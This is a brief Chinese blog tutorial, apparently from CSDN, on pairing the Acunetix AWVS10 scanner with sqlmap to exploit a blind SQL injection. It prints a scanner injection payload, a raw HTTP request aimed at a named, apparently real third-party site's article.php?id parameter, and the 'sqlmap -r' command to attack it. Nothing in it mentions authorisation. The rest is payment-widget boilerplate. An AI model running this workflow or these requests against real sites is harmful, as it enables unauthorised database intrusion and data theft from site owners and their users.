AWVS10_Acunetix_Web_Vulnerability_Scanner教程-扫描配合sql进行注入

本文介绍了如何使用Acunetix Web Vulnerability Scanner(AWVS10)配合sqlmap工具进行Web安全扫描,特别是针对Blind SQL注入的检测。通过右键提取请求,将请求内容保存为txt文件,并利用sqlmap的命令行选项进行扫描,以检测潜在的SQL注入漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

右键Blind SQL injection


直接复制包的内容放到sqlmap目录下

去掉%20AND%203*2*1%3d6%20AND%20347%3d347 

保存为1.txt

GET /article.php?id=1031HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.deta.com.cn:80/index.php
Host: www.deta.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

然后python sqlmap.py -r 1.txt

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值